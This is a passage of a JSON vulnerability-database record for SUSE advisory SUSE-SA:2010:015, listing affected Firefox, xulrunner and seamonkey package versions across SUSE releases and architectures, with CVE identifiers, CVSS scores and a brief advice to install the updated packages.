"SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-gnomevfs-32bit-1.9.1.8-1.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-gnomevfs-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner190-translations-x86-1.9.0.18-0.1.1.ia64.rpm", "packageName": "mozilla-xulrunner190-translations-x86", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "3.5.8-0.3", "arch": "ppc", "packageFilename": "MozillaFirefox-translations-3.5.8-0.3.ppc.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.8-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-32bit-1.9.1.8-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.1.8-1.4.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner191-translations-1.9.1.8-1.4.1.ia64.rpm", "packageName": "mozilla-xulrunner191-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner191-debugsource-1.9.1.8-1.1.1.s390x.rpm", "packageName": "mozilla-xulrunner191-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.0.3-0.1.1", "arch": "i586", "packageFilename": "seamonkey-irc-2.0.3-0.1.1.i586.rpm", "packageName": "seamonkey-irc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.3", "packageVersion": "1.9.1.8-1.4.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner191-devel-1.9.1.8-1.4.1.s390x.rpm", "packageName": "mozilla-xulrunner191-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.0.18-0.4.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner190-gnomevfs-1.9.0.18-0.4.1.s390x.rpm", "packageName": "mozilla-xulrunner190-gnomevfs", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.1.8-1.4.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner191-gnomevfs-1.9.1.8-1.4.1.ppc.rpm", "packageName": "mozilla-xulrunner191-gnomevfs", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.3", "packageVersion": "1.9.0.18-0.4.1", "arch": "s390x", "packageFilename": "python-xpcom190-1.9.0.18-0.4.1.s390x.rpm", "packageName": "python-xpcom190", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.8-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-translations-common-1.9.1.8-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-translations-common", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner191-1.9.1.8-1.1.1.ia64.rpm", "packageName": "mozilla-xulrunner191", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.0.18-0.4.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-debuginfo-1.9.0.18-0.4.1.x86_64.rpm", "packageName": "mozilla-xulrunner190-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner191-gnomevfs-1.9.1.8-1.1.1.ppc64.rpm", "packageName": "mozilla-xulrunner191-gnomevfs", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner190-debuginfo-1.9.0.18-0.1.1.s390x.rpm", "packageName": "mozilla-xulrunner190-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.3", "packageVersion": "1.9.0.18-0.4.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner190-devel-1.9.0.18-0.4.1.ia64.rpm", "packageName": "mozilla-xulrunner190-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.8-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-1.9.1.8-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner191", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.0.18-0.4.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-gnomevfs-32bit-1.9.0.18-0.4.1.x86_64.rpm", "packageName": "mozilla-xulrunner190-gnomevfs-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-1.9.1.8-1.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner191", "operator": "lt"}, {"OS": "SUSE SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.2", "packageVersion": "1.9.0.18-0.4.1", "arch": "i586", "packageFilename": "python-xpcom190-1.9.0.18-0.4.1.i586.rpm", "packageName": "python-xpcom190", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "3.0.18-0.1", "arch": "i586", "packageFilename": "MozillaFirefox-debuginfo-3.0.18-0.1.i586.rpm", "packageName": "MozillaFirefox-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.9.0.18-0.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-translations-1.9.0.18-0.1.x86_64.rpm", "packageName": "mozilla-xulrunner190-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.1.8-1.4.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner191-gnomevfs-1.9.1.8-1.4.1.ia64.rpm", "packageName": "mozilla-xulrunner191-gnomevfs", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.0.18-0.4.1", "arch": "i586", "packageFilename": "mozilla-xulrunner190-gnomevfs-1.9.0.18-0.4.1.i586.rpm", "packageName": "mozilla-xulrunner190-gnomevfs", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.0.18-0.1.1", "arch": "ppc", "packageFilename": "python-xpcom190-1.9.0.18-0.1.1.ppc.rpm", "packageName": "python-xpcom190", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.1.8-1.4.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-gnomevfs-32bit-1.9.1.8-1.4.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-gnomevfs-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.1.8-1.4.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner191-translations-1.9.1.8-1.4.1.s390x.rpm", "packageName": "mozilla-xulrunner191-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner190-devel-1.9.0.18-0.1.1.ppc64.rpm", "packageName": "mozilla-xulrunner190-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner190-32bit-1.9.0.18-0.1.1.ppc64.rpm", "packageName": "mozilla-xulrunner190-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.1.8-1.4.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-translations-32bit-1.9.1.8-1.4.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-translations-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.0.18-0.1.1", "arch": "ppc", "packageFilename": "MozillaFirefox-debuginfo-3.0.18-0.1.1.ppc.rpm", "packageName": "MozillaFirefox-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.1.8-1.4.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner191-1.9.1.8-1.4.1.ppc.rpm", "packageName": "mozilla-xulrunner191", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.0.18-0.1.1", "arch": "ppc", "packageFilename": "MozillaFirefox-branding-upstream-3.0.18-0.1.1.ppc.rpm", "packageName": "MozillaFirefox-branding-upstream", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.1.8-1.4.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-gnomevfs-1.9.1.8-1.4.1.i586.rpm", "packageName": "mozilla-xulrunner191-gnomevfs", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.0.18-0.4.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner190-debuginfo-1.9.0.18-0.4.1.ia64.rpm", "packageName": "mozilla-xulrunner190-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "0.6-0.1.2", "arch": "i586", "packageFilename": "mozilla-xulrunner191-kde4-0.6-0.1.2.i586.rpm", "packageName": "mozilla-xulrunner191-kde4", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.0.18-0.1.1", "arch": "x86_64", "packageFilename": "python-xpcom190-1.9.0.18-0.1.1.x86_64.rpm", "packageName": "python-xpcom190", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.9.0.18-0.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner190-gnomevfs-1.9.0.18-0.1.ppc.rpm", "packageName": "mozilla-xulrunner190-gnomevfs", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.1.8-1.4.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner191-32bit-1.9.1.8-1.4.1.s390x.rpm", "packageName": "mozilla-xulrunner191-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.1.8-1.4.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-gnomevfs-32bit-1.9.1.8-1.4.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-gnomevfs-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.8-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-gnomevfs-1.9.1.8-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner191-gnomevfs", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.9.0.18-0.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner190-devel-1.9.0.18-0.1.ppc.rpm", "packageName": "mozilla-xulrunner190-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner190-gnomevfs-x86-1.9.0.18-0.1.1.ia64.rpm", "packageName": "mozilla-xulrunner190-gnomevfs-x86", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.0.18-0.4.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-32bit-1.9.0.18-0.4.1.x86_64.rpm", "packageName": "mozilla-xulrunner190-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.0.3-0.1.1", "arch": "x86_64", "packageFilename": "seamonkey-2.0.3-0.1.1.x86_64.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.0.18-0.1.1", "arch": "i586", "packageFilename": "MozillaFirefox-branding-upstream-3.0.18-0.1.1.i586.rpm", "packageName": "MozillaFirefox-branding-upstream", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "3.5.8-0.3", "arch": "i586", "packageFilename": "MozillaFirefox-translations-3.5.8-0.3.i586.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.1.8-1.4.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-debuginfo-1.9.1.8-1.4.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-debuginfo", "operator": "lt"}, {"OS": "SUSE SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.2", "packageVersion": "1.9.1.8-1.4.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner191-devel-1.9.1.8-1.4.1.s390x.rpm", "packageName": "mozilla-xulrunner191-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.1.8-1.4.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner191-translations-1.9.1.8-1.4.1.s390x.rpm", "packageName": "mozilla-xulrunner191-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.0.18-0.4.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-translations-32bit-1.9.0.18-0.4.1.x86_64.rpm", "packageName": "mozilla-xulrunner190-translations-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.0.3-0.1.1", "arch": "i586", "packageFilename": "seamonkey-venkman-2.0.3-0.1.1.i586.rpm", "packageName": "seamonkey-venkman", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.5.8-0.1.1", "arch": "ppc64", "packageFilename": "MozillaFirefox-debuginfo-3.5.8-0.1.1.ppc64.rpm", "packageName": "MozillaFirefox-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.9.0.18-0.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner190-1.9.0.18-0.1.ppc.rpm", "packageName": "mozilla-xulrunner190", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.0.18-0.4.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner190-1.9.0.18-0.4.1.s390x.rpm", "packageName": "mozilla-xulrunner190", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.5.8-0.1.1", "arch": "i586", "packageFilename": "MozillaFirefox-3.5.8-0.1.1.i586.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner190-translations-1.9.0.18-0.1.1.s390x.rpm", "packageName": "mozilla-xulrunner190-translations", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.0.18-0.1.1", "arch": "i586", "packageFilename": "python-xpcom190-1.9.0.18-0.1.1.i586.rpm", "packageName": "python-xpcom190", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-debugsource-1.9.1.8-1.1.1.i586.rpm", "packageName": "mozilla-xulrunner191-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.0.18-0.4.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner190-1.9.0.18-0.4.1.s390x.rpm", "packageName": "mozilla-xulrunner190", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.0.18-0.4.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-1.9.0.18-0.4.1.x86_64.rpm", "packageName": "mozilla-xulrunner190", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.0.18-0.1.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner190-gnomevfs-1.9.0.18-0.1.1.ppc.rpm", "packageName": "mozilla-xulrunner190-gnomevfs", "operator": "lt"}, {"OS": "SUSE SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.2", "packageVersion": "1.9.0.18-0.4.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner190-devel-1.9.0.18-0.4.1.ia64.rpm", "packageName": "mozilla-xulrunner190-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.1.8-1.4.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner191-1.9.1.8-1.4.1.s390x.rpm", "packageName": "mozilla-xulrunner191", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.5.8-0.1.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-debuginfo-3.5.8-0.1.1.x86_64.rpm", "packageName": "MozillaFirefox-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.0.18-0.4.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-gnomevfs-32bit-1.9.0.18-0.4.1.x86_64.rpm", "packageName": "mozilla-xulrunner190-gnomevfs-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.0.18-0.1.1", "arch": "ppc", "packageFilename": "MozillaFirefox-3.0.18-0.1.1.ppc.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner190-translations-1.9.0.18-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner190-translations", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.8-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-debugsource-1.9.1.8-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner191-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.8-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-translations-other-1.9.1.8-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner191-translations-other", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner190-debuginfo-1.9.0.18-0.1.1.ia64.rpm", "packageName": "mozilla-xulrunner190-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.5.8-0.1.1", "arch": "i586", "packageFilename": "MozillaFirefox-debugsource-3.5.8-0.1.1.i586.rpm", "packageName": "MozillaFirefox-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.0.18-0.1.2", "arch": "x86_64", "packageFilename": "MozillaFirefox-debugsource-3.0.18-0.1.2.x86_64.rpm", "packageName": "MozillaFirefox-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "3.5.8-0.4.1", "arch": "s390x", "packageFilename": "MozillaFirefox-3.5.8-0.4.1.s390x.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.0.3-0.1.1", "arch": "x86_64", "packageFilename": "seamonkey-debuginfo-2.0.3-0.1.1.x86_64.rpm", "packageName": "seamonkey-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner190-1.9.0.18-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner190", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.3", "packageVersion": "1.9.0.18-0.4.1", "arch": "ia64", "packageFilename": "python-xpcom190-1.9.0.18-0.4.1.ia64.rpm", "packageName": "python-xpcom190", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.0.18-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-gnomevfs-32bit-1.9.0.18-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner190-gnomevfs-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner191-32bit-1.9.1.8-1.1.1.s390x.rpm", "packageName": "mozilla-xulrunner191-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.0.18-0.4.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner190-1.9.0.18-0.4.1.ppc.rpm", "packageName": "mozilla-xulrunner190", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.0.18-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-debuginfo-32bit-1.9.0.18-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner190-debuginfo-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "3.5.8-0.4.1", "arch": "i586", "packageFilename": "MozillaFirefox-debuginfo-3.5.8-0.4.1.i586.rpm", "packageName": "MozillaFirefox-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "3.5.8-0.4.1", "arch": "ppc", "packageFilename": "MozillaFirefox-debuginfo-3.5.8-0.4.1.ppc.rpm", "packageName": "MozillaFirefox-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.3", "packageVersion": "1.9.1.8-1.4.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner191-devel-1.9.1.8-1.4.1.ia64.rpm", "packageName": "mozilla-xulrunner191-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner190-translations-32bit-1.9.0.18-0.1.1.ppc64.rpm", "packageName": "mozilla-xulrunner190-translations-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.8-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-gnomevfs-debuginfo-1.9.1.8-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner191-gnomevfs-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner190-devel-1.9.0.18-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner190-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner190-translations-1.9.0.18-0.1.1.ppc64.rpm", "packageName": "mozilla-xulrunner190-translations", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.8-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-gnomevfs-debuginfo-32bit-1.9.1.8-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-gnomevfs-debuginfo-32bit", "operator": "lt"}, {"OS": "SUSE SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.2", "packageVersion": "1.9.1.8-1.4.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-devel-1.9.1.8-1.4.1.i586.rpm", "packageName": "mozilla-xulrunner191-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.0.18-0.4.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner190-translations-1.9.0.18-0.4.1.s390x.rpm", "packageName": "mozilla-xulrunner190-translations", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.0.18-0.1.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner190-debugsource-1.9.0.18-0.1.1.ppc.rpm", "packageName": "mozilla-xulrunner190-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.9.0.18-0.1", "arch": "i586", "packageFilename": "mozilla-xulrunner190-debuginfo-1.9.0.18-0.1.i586.rpm", "packageName": "mozilla-xulrunner190-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.5.8-0.1.1", "arch": "i586", "packageFilename": "MozillaFirefox-branding-upstream-3.5.8-0.1.1.i586.rpm", "packageName": "MozillaFirefox-branding-upstream", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.1.8-1.4.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-32bit-1.9.1.8-1.4.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-debuginfo-1.9.1.8-1.1.1.i586.rpm", "packageName": "mozilla-xulrunner191-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.0.18-0.4.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner190-gnomevfs-1.9.0.18-0.4.1.ppc.rpm", "packageName": "mozilla-xulrunner190-gnomevfs", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner190-debuginfo-1.9.0.18-0.1.1.ppc64.rpm", "packageName": "mozilla-xulrunner190-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.0.18-0.1.1", "arch": "i586", "packageFilename": "MozillaFirefox-3.0.18-0.1.1.i586.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-translations-1.9.0.18-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner190-translations", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.8-0.1.1", "arch": "i586", "packageFilename": "python-xpcom191-debuginfo-1.9.1.8-0.1.1.i586.rpm", "packageName": "python-xpcom191-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner190-32bit-1.9.0.18-0.1.1.s390x.rpm", "packageName": "mozilla-xulrunner190-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner191-x86-1.9.1.8-1.1.1.ia64.rpm", "packageName": "mozilla-xulrunner191-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.9.0.18-0.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-debuginfo-1.9.0.18-0.1.x86_64.rpm", "packageName": "mozilla-xulrunner190-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.0.3-0.1.1", "arch": "i586", "packageFilename": "seamonkey-2.0.3-0.1.1.i586.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.0.18-0.4.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner190-translations-1.9.0.18-0.4.1.s390x.rpm", "packageName": "mozilla-xulrunner190-translations", "operator": "lt"}], "description": "Mozilla Firefox was upgraded to version 3.5.8, fixing various bugs and security issues.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "reporter": "Suse", "published": "2010-03-04T16:53:48", "title": "remote code execution in MozillaFirefox,seamonkey", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2010-0160", "CVE-2009-1571", "CVE-2010-0159", "CVE-2010-0162", "CVE-2009-3988"], "modified": "2010-03-04T16:53:48", "id": "SUSE-SA:2010:015", "href": "http://lists.opensuse.org/opensuse-security-announce/2010-03/msg00001.html", "cvss": {"score": 10.0, "vector": 